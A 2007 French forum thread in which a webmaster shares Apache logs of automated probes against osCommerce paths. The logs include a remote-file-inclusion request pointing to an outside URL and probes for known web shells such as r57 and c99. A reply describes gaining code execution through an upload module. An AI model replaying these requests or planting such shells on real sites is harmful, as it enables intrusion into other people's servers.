Tentative hacking sur fichiers oscommerce
Tentative hacking sur fichiers oscommerce - Hébergement - Réseaux grand public / SoHo
Marsh Posté le 14-11-2007 à 07:05:06
![[:totoz]](https://forum-images.hardware.fr/images/perso/totoz.gif "[:totoz]")
non, franchement, les logs apache, on en a tous des kilometres, et on meurt pas. 
Marsh Posté le 14-11-2007 à 08:40:00
Ok, ça commence comme ça :
83.143.19.240 - - [13/Nov/2007:22:20:56 +0100] "GET /include.php?path=misc/finduser.php HTTP/1.1" 301 5 portail-patrimoine.com "-" "Mozilla/5.0" "-"
83.143.19.240 - - [13/Nov/2007:22:20:56 +0100] "GET /catalog/admin/index.php HTTP/1.1" 404 72 portail-patrimoine.com "-" "Mozilla/5.0" "-"
83.143.19.240 - - [13/Nov/2007:22:20:57 +0100] "GET /shop/admin/index.php HTTP/1.1" 404 72 portail-patrimoine.com "-" "Mozilla/5.0" "-"
83.143.19.240 - - [13/Nov/2007:22:21:16 +0100] "GET /html/phpkit/include.php?path=misc/finduser.php HTTP/1.1" 301 5 portail-patrimoine.com "-" "Mozilla/5.0" "-"
83.143.19.240 - - [13/Nov/2007:22:21:32 +0100] "GET /rss.php?sitemap=http://www.power-racing-online.de/pro/pro/content/images/conf? HTTP/1.1" 200 47895 portail-patrimoine.com "-" "Mozilla/5.0" "-"
Message édité par grosbin le 14-11-2007 à 08:46:23
---------------
Photos Panoramiques Montagnes Haute Savoie
Marsh Posté le 20-11-2007 à 15:32:39
Pour avoir travailler sur OSCommerce. Cette application n'est pas du tout sécurisé. Donc il est normal que certain font des attaques massif sur cette application. Donc il faut pas s'étonner de cela.
Marsh Posté le 20-11-2007 à 15:51:52
Perso j'ai toujours préféré créer des application personnelles ces tentatives m'ont bien fait rire 
---------------
Photos Panoramiques Montagnes Haute Savoie
Marsh Posté le 20-11-2007 à 15:54:46
| grosbin a écrit : Perso j'ai toujours préféré créer des application personnelles ces tentatives m'ont bien fait rire |
En effet, c'est un risque d'avoir une application populaire sans le mettre à l'epreuve. PhpBb en est l'exemple parfait.
Personnellement, j'ai réussi à hacker une machine avec oscommerce. Il y a un module permettant d'uploader n'importe quel fichier. Donc j'ai pu uploader un fichier php avec un simple script permettant d'executer n'importe quel code php via la commande system.
Marsh Posté le 20-11-2007 à 16:00:38
Sympa comme faille, je donne la liste de sites fait via OsCommerce et phpBB directement ?
---------------
Photos Panoramiques Montagnes Haute Savoie
Sujets relatifs:
- noms des fichiers partiels sur FTP
- [RESOLU] Partage de fichiers en Wifi
- partage de fichiers
- [urgent, mon site: hacké] comment lire des fichiers acess_log ?
- Réseau local - Internet partagé mais pas les fichiers
- Probléme telechargement : fichiers corrompus
- Envoi impossible de mes fichiers sur le réseau
- Hébergement de fichiers & création d'un FTP sécurisé pr téléchargement
- partage de fichiers entre mac et pc et vice et versa
- Patage fichiers entre 2 pc en local visible sur internet?
Marsh Posté le 14-11-2007 à 00:11:07
Bonsoir
J'ai eu des tentatives de hacking de "83.143.19.240" ce soir, près de 400 essais infructueux, générant autant d'erreurs 404
J'en ai averti son hébergeur (CTN1) pour éviter des suites .. la traceroute ne mêne pas plus loin
Je n'héberge pas d'oscommerce mais je trouve cela assez préjudiciable et énervant que des gosses s'amusent à rechercher des failles de sécurité partout où elles ne sont pas ( du moins j'en suis convaincu )
Votre expérience ? Mauvais présage ou juste un petit vent ?
type de fichiers :
oscommerce1/admin/c1000.php
onlineshop/admin/c100.php
shop/admin/export.php
shop1/admin/r57.php
catalog/admin/c99.php
catalog1/admin/shell.php
J'en conclus qu'il s'agit de failles générales ces fichiers
une petite recherche google amène rapidement à des backdoors trojan directement détectés par norton, sur page php mise en cache, joli
Message édité par grosbin le 14-11-2007 à 00:19:55
---------------
Photos Panoramiques Montagnes Haute Savoie